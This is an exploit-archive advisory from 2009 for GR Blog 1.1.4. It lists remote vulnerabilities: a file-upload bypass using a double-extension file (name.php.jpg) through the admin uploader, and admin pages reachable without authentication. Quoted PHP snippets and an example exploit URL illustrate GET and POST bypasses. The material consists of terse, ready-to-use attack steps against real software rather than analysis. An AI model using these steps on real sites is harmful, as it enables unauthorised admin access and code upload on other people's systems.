[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : GR Blog 1.1.4 (Upload/Bypass) Multiple Remote Vulnerabilities
# Published : 2009-02-04
# Author : JosS
# Previous Title : YapBB <= 1.2 (forumID) Blind SQL Injection Exploit
# Next Title : GR Note 0.94 beta (Auth Bypass) Remote Database Backup Vulnerability


GR Blog v1.1.4 (Upload/Bypass) Multiple Remote Vulnerabilities
 
Author: Jose Luis Gongora Fernandez
        (a.k.a) JosS <sys-project[at]hotmail.com>

Web:    http://hack0wn.com/
 
/*************************/
TEST ON VERSION GR Blog v1.1.4, (in my localhost)
Download : http://sirini.net/grboard/board.php?id=grblog&articleNo=43
/*************************/
 
[+] Remote File Upload:
 
 /admin/admin_upload.php (simple bypass)
 upload --> name.php.jpg
 
 PATH example: /data/2009/02/04/name.php.jpg
 
 
 --------------
 files: /admin
 
[+] SIMPLE bypass:
 
 admin_user.php
 admin_post.php
 admin_all.php
 more files...
 
 !xpl: you enter in any files
 
[+] GET bypass:
 
 admin_modify_comment.php
 --
 <?php
 @header('Content-Type: text/html; charset=utf-8');
 if(array_key_exists('uid', $_GET) && $_GET['uid']) $uid = $_GET['uid'];
 else exit();
 --
 !xpl: http://localhost/blog/admin/admin_modify_comment.php?uid=1
 
 more files...
 
[+] POST bypass:
 
 admin_category.php
 --
 <?php
 if(array_key_exists('categoryName', $_POST) && $_POST['categoryName'])
 --
 !xpl: --
 
 admin_insert.php
 --
 <?php
 $e = true;
 if(array_key_exists('postStart', $_POST) && $_POST['postStart'])
 --
 !xpl: --
 
 more files...
 
 __h0__

# www.Syue.com [2009-02-04]